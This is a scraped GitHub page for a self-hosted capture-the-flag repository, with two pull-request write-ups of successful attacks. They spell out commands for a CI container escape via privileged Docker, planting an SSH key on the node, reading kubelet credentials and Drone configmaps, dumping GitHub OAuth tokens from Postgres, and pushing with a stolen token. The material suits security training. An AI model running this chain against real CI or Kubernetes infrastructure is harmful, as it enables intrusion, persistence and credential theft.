Hack this repo and add your name to the list above. Creativity and style encouraged in both endeavors.

      ___           ___                   ___           ___
     /\  \         /\__\      ___        /\  \         /\  \
    /::\  \       /:/  /     /\  \       \:\  \       /::\  \
   /:/\:\  \     /:/  /      \:\  \       \:\  \     /:/\:\  \
  /::\~\:\  \   /:/  /       /::\__\      /::\  \   /::\~\:\  \
 /:/\:\ \:\__\ /:/__/     __/:/\/__/     /:/\:\__\ /:/\:\ \:\__\
 \:\~\:\ \/__/ \:\  \    /\/:/  /       /:/  \/__/ \:\~\:\ \/__/
  \:\ \:\__\    \:\  \   \::/__/       /:/  /       \:\ \:\__\
   \:\ \/__/     \:\  \   \:\__\       \/__/         \:\ \/__/
    \:\__\        \:\__\   \/__/                      \:\__\
     \/__/         \/__/                               \/__/
      ___           ___           ___           ___           ___           ___           ___
     /\__\         /\  \         /\  \         /\__\         /\  \         /\  \         /\  \
    /:/  /        /::\  \       /::\  \       /:/  /        /::\  \       /::\  \       /::\  \
   /:/__/        /:/\:\  \     /:/\:\  \     /:/__/        /:/\:\  \     /:/\:\  \     /:/\ \  \
  /::\  \ ___   /::\~\:\  \   /:/  \:\  \   /::\__\____   /::\~\:\  \   /::\~\:\  \   _\:\~\ \  \
 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/ \:\__\ /:/\:::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \ \__\
 \/__\:\/:/  / \/__\:\/:/  / \:\  \  \/__/ \/_|:|~~|~    \:\~\:\ \/__/ \/_|::\/:/  / \:\ \:\ \/__/
      \::/  /       \::/  /   \:\  \          |:|  |      \:\ \:\__\      |:|::/  /   \:\ \:\__\
      /:/  /        /:/  /     \:\  \         |:|  |       \:\ \/__/      |:|\/__/     \:\/:/  /
     /:/  /        /:/  /       \:\__\        |:|  |        \:\__\        |:|  |        \::/  /
     \/__/         \/__/         \/__/         \|__|         \/__/         \|__|         \/__/

CTF

Hack this repo and add your name to the list above. Creativity and style encouraged in both endeavors.

Rules

Its hacking, there are no rules! Though you probably shouldn't break any local laws.

Requests

Please don't interfere with anyone else trying to capture the flag.

This includes:

  • removing someone else's back door
  • removing key pivot information
  • hardening the node/service
  • removing other folks from the list or force pushing to erase history

Share your victories and tips in #ctf.

If you think you broke something, reach out to walt.

Owner
Danger
Am I a robot?
Danger
https://github.com/danger-della/ctf
Similar Resources

Create one endpoint with add user functionality

hubuc-task Create one endpoint with add user functionality

Nov 13, 2021

Go library for hardware I/O control, in the programming style of Arduino

hwio Introduction hwio is a Go library for interfacing with hardware I/O, particularly on SoC-based boards such as BeagleBone Black, Raspberry Pi and

Dec 9, 2022

Monitor star changes of GitHub repo, and send the notification to slack or lark.

stargazers Features monitor the star events of the GitHub repo send the notifications to Slack or Lark How to use For Lark, create a bot called like s

Dec 4, 2022

Auto-updating F-Droid repo using GitHub Actions

Auto-updating F-Droid repo using GitHub Actions

fdroid This repository hosts an F-Droid repo for my apps. This allows you to install and update apps very easily. How to use At first, you should inst

Dec 29, 2022

Orkestra Workflow Executor Template Repo

Orkestra Workflow Executor Template Repo This is a template repository for a new workflow executor Usage Generate your repository from this template b

Nov 9, 2021

OpenFunction Sample Repo

OpenFunction Samples Installation Version OpenFunction v0.4.0 Setup a Cluster minikube start -p demo --kubernetes-version=v1.22.2 --network-plugin=cni

Apr 20, 2022

A toy repo used to test the functionality of "go mod why".

Mod Why Test Discussion From a module perspective: The main module (github.com/ejweber/mod-why-test) has a single direct dependency (github.com/ejwebe

Dec 1, 2021

To get json about repo&pkg relationship

pkg_repo_tool 1. Usage 把从 frameworks 收集到的 bp 文件放到一个文件夹中。在这里为了方便叙述,就把这个文件夹命名为 frameworks 并且放在 bprepo2json/main 之下。 然后: cd bprepo2json/main go run .

Jan 11, 2022

Repo Tugas Problem Solving Paradigm (Greedy, D&C, Dynamic Programming) ALTA Immersive BE5

Repo Tugas Problem Solving Paradigm (Greedy, D&C, Dynamic Programming) ALTA Immersive BE5

Cara mengerjakan tugas clone project ini, melalui git clone https://github.com/ALTA-Immersive-BE5/Problem-Solving-Paradigm.git setelah clone selesai,

Dec 23, 2021
Comments
  • Totally innocuous typo fix

    Totally innocuous typo fix

    Explanation

    This abuses docker-in-docker volume mounts to open a remote shell on the Drone container itself. This hopefully better disguises the eventual --privileged escape. Once we mount the outer Drone worker, we chroot into it and create a reverse shell. From there, we spawn a privileged container, gain access to the node itself, and extract secrets from other containers running on the node.

    From the interactive remote shell, we can then freely spawn a --privileged container, mount the node's /, install an SSH key in /home/ec2-user/.ssh/authorized_keys, and discover the node's IP:

    # access the node's rootfs
$ docker run --privileged --rm -it alpine
$ mount /dev/nvme0n1p1 /mnt

# install an ssh key
$ cd /mnt/home/ec2-user/.ssh
$ echo "<ssh public key>" >> .authorized_keys

# discover the public IP
$ apk add curl 
$ curl ifconfig.me

    (not shown: accidentally hitting ctrl+c approximately 12 times and having to start over from scratch)

    Next, ssh into the node. It's a k8s node, so we can look for interesting docker containers. Looks like there's a drone server:

    $ docker ps | grep -i drone-server | grep -v pause
243146925dfe        112b23978e25                                                            "/bin/drone-server"       17 hours ago        Up 17 hours                             k8s_server_drone-7cf8565555-wmnsw_drone_b6b3725e-223e-4793-97a7-eb07f412325c_0

    exec into it and check out the env:

    $ docker exec -it 243146925dfe sh
$ env
[...]
DRONE_DATABASE_DATASOURCE=<snip>
[...]

    Grab the postgres connection details and return to the node. Open a postgres shell:

    $ psql -h <host> -p 5432 -U postgres
postgres=> \dt
           List of relations
 Schema |    Name    | Type  |  Owner
--------+------------+-------+----------
 public | builds     | table | postgres
 public | cron       | table | postgres
 public | latest     | table | postgres
 public | logs       | table | postgres
 public | migrations | table | postgres
 public | nodes      | table | postgres
 public | orgsecrets | table | postgres
 public | perms      | table | postgres
 public | repos      | table | postgres
 public | secrets    | table | postgres
 public | stages     | table | postgres
 public | steps      | table | postgres
 public | users      | table | postgres
postgres=> select user_login,user_oauth_token from users;
  user_login  |             user_oauth_token
--------------+------------------------------------------
 example | <snip>
(1 row)

    With a github user and token, we can have some fun. Back on your own box, clone the repo over https:

    $ git clone https://github.com/danger-della/ctf.git
$ cd ctf
$ [... make some changes ...]
$ git commit
$ git push

    You'll be prompted for a username and password. Enter the username from above, and use the token as the password. The push should succeed. 🎉

  • Important features

    Important features

    My solution:
    Create this PR and get a reverse shell. 
    $ mount # observe /dev/nvme0n1p1
$ mkdir /tmp/rootfs
$ mount /dev/nvme0n1p1 /tmp/rootfs
$ chroot /tmp/rootfs
$ cd /tmp
$ curl -LO https://dl.k8s.io/release/v1.22.0/bin/linux/amd64/kubectl
$ chmod u+x kubectl
$ # ... mess around a bit, see where the kubernetes files are ...
$ # kubelets do not have the permission to *list* namespaces, I guessed `drone` correctly
$ /tmp/kubectl --kubeconfig /var/lib/kubelet/kubeconfig -v 6 -n drone get pods -o yaml 2>&1 
$ # observe that it uses configmap `drone`
$ /tmp/kubectl --kubeconfig /var/lib/kubelet/kubeconfig -v 6 -n drone get configmap/drone -o yaml 2>&1
$ # observe DRONE_DATABASE_DATASOURCE
$ yum install postgresql # sorry for messing with the global state of the system
$ psql postgres://...
> select user_oauth_token from users;

    Then use GitHub API:

    #!/usr/bin/env python3

from github import Github # pip install PyGithub

g = Github("<...>snip<...>")
repo = g.get_user().get_repos()[0]
assert repo.name == "ctf"

readme = next(f for f in repo.get_dir_contents("/") if f.name == "README.md")
sha = readme.sha
new_content = r"""
<...>snip<...>
"""
print(new_content)
repo.update_file("README.md", "pwned", new_content, sha)
Related tags
Miscellaneous ctf
Generic-list-go - Go container/list but with generics

generic-list-go Go container/list but with generics. The code is based on contai

Dec 7, 2022
Package buildinfo provides basic building blocks and instructions to easily add build and release information to your app.
 Package buildinfo provides basic building blocks and instructions to easily add build and release information to your app.

Package buildinfo provides basic building blocks and instructions to easily add build and release information to your app. This is done by replacing variables in main during build with ldflags.

Nov 14, 2021
An easy way to add useful startup banners into your Go applications
 An easy way to add useful startup banners into your Go applications

Try browsing the code on Sourcegraph! Banner Add beautiful banners into your Go applications Table of Contents Motivation Usage API Command line flags

Jan 1, 2023
Shows your recent browser history in tree style. 树状展示浏览器历史 (For Edge / Chromium / Chrome)
 Shows your recent browser history in tree style. 树状展示浏览器历史 (For Edge / Chromium / Chrome)

Tree Style Histyle This extension shows your recent browser history in tree style. When you browser pages from internet, you always jump from one page

Jan 3, 2023
Package fsm allows you to add finite-state machines to your Go code.

fsm Package fsm allows you to add finite-state machines to your Go code. States and Events are defined as int consts: const ( StateFoo fsm.State =

Dec 9, 2022
Script to generate a web page for your Aliucord plugins repo.

Aliucord-Store Script used to generate a website front-end for your plugins. Usage: go run cmds/store/main.go -dir string Your repository's

Jan 31, 2022
As the name says. Forges badge responses for the Defcon 29 badge and allows folks to jump straight to having completed the signal.

Defcon 29 Badge Code Generator Exactly as the title says. Will generate 7 signal keys to get you to signal then will generate 20 keys to distribute th

Aug 25, 2021
Makes a VM, imaginative name, I know

mkvm Makes a virtual machine from a bunch of templates using cloud-init userdata to customize them. This is an experimental tool I made for testing th

Jan 7, 2023
RinkWorks fantasy name generator in golang

RinkWorks fantasy name generator in golang

Dec 25, 2022
Go library for Common Lisp format style output

format This library has the goal to bring the Common Lisp format directive to Go. This is work-in-progress, see the summary implementation table below

Jul 7, 2020